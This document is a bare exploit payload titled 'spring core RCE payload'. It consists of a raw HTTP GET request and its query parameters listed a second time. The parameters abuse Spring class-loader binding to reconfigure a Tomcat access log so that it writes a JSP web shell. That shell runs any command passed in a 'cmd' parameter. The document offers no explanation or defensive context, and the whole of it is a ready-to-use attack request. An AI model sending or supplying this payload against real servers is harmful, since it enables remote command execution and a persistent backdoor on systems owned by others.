spring core RCE payload

GET /?class.module.classLoader.resources.context.parent.parent.appBase=./&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_4&class.module.classLoader.resources.context.parent.pipeline.first.checkExists=true&class.module.classLoader.resources.context.parent.pipeline.first.rotatable=true&class.module.classLoader.resources.context.parent.pipeline.first.prefix=test1&class.module.classLoader.resources.context.parent.pipeline.first.buffered=false&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%3Cjsp%3Ascriptlet%3Eout.println(Runtime.getRuntime().exec(request.getParameter(%22cmd%22)))%3B%3C%2Fjsp%3Ascriptlet%3E HTTP/1.1
Host: 192.168.x.x:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

?class.module.classLoader.resources.context.parent.parent.appBase=./&
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_4&
class.module.classLoader.resources.context.parent.pipeline.first.checkExists=true&
class.module.classLoader.resources.context.parent.pipeline.first.rotatable=true&
class.module.classLoader.resources.context.parent.pipeline.first.prefix=test1&
class.module.classLoader.resources.context.parent.pipeline.first.buffered=false&
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%3Cjsp%3Ascriptlet%3Eout.println(Runtime.getRuntime().exec(request.getParameter(%22cmd%22)))%3B%3C%2Fjsp%3Ascriptlet%3E